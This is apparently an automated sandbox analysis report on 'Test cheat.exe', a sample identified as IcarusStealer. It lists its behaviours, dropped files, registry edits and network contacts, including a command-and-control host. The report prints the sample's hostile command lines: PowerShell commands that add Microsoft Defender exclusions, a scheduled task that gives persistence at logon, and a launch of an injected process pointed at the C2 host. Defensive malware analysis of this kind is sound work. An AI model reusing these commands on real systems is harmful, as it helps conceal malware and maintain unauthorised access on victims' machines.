Analysis Overview
SHA256
13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
Threat Level: Known bad
The file Test cheat.exe was found to be: Known bad.
Malicious Activity Summary
IcarusStealer
Modifies Installed Components in the registry
Blocklisted process makes network request
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Delays execution with timeout.exe
Enumerates system info in registry
Suspicious use of SetWindowsHookEx
Modifies registry class
NTFS ADS
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Suspicious behavior: GetForegroundWindowSpam
Modifies system certificate store
Uses Volume Shadow Copy service COM API
Uses Volume Shadow Copy WMI provider
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Uses Task Scheduler COM API
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-03-09 22:40
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-09 22:40
Reported
2024-03-09 22:42
Platform
win7-20240221-en
Max time kernel
150s
Max time network
147s
Command Line
Signatures
IcarusStealer
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test cheat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\CatRoot\$SXR\Read.txt | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File created | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot\$SXR\Read.txt | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2540 set thread context of 776 | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Test cheat.exe
"C:\Users\Admin\AppData\Local\Temp\Test cheat.exe"
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Users\Admin\AppData\Local\Temp\switched.exe
"C:\Users\Admin\AppData\Local\Temp\switched.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\getngk55\getngk55.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1AC1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCD5AC9B0E9E34FA5B096EC3B1E36CCE.TMP"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe & exit
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp2AF7.tmp.bat""
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\System32\CatRoot\$SXR\$SXR.exe
"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "$SXR"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp87FD.tmp.bat""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp87FE.tmp.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" title $SXR "
C:\Windows\SysWOW64\schtasks.exe
schtasks /delete /f /tn "$SXR"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" title $SXR "
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | case-shield.gl.at.ply.gg | udp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | operating-noble.gl.at.ply.gg | udp |
| US | 147.185.221.18:52033 | operating-noble.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:49219 | N/A | tcp |
| N/A | 127.0.0.1:49221 | N/A | tcp |
| N/A | 127.0.0.1:49304 | N/A | tcp |
| N/A | 127.0.0.1:49306 | N/A | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-09 22:40
Reported
2024-03-09 22:42
Platform
win10v2004-20240226-en
Max time kernel
103s
Max time network
152s
Command Line
Signatures
IcarusStealer
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Test cheat.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cvtresa.exe | N/A |
| N/A | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
Loads dropped DLL
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\CatRoot\$SXR\Read.txt | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
| File created | C:\Windows\System32\CatRoot\$SXR\Read.txt | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File created | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1592 set thread context of 3608 | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI42E1.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI42E1.tmp-\Microsoft.Deployment.WindowsInstaller.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI42E1.tmp-\CustomAction.config | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8B95.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8B95.tmp-\Microsoft.Deployment.WindowsInstaller.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8B95.tmp-\CustomAction.config | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7982.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7982.tmp-\Microsoft.Deployment.WindowsInstaller.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7982.tmp-\CustomAction.config | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8B95.tmp-\CustomActionManaged.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI42E1.tmp-\CustomActionManaged.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{B85FAA6E-A9AA-4655-9029-E1A4EDC05E1A} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e583e8b.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e583e8b.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI4263.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7982.tmp-\CustomActionManaged.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7E46.tmp | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
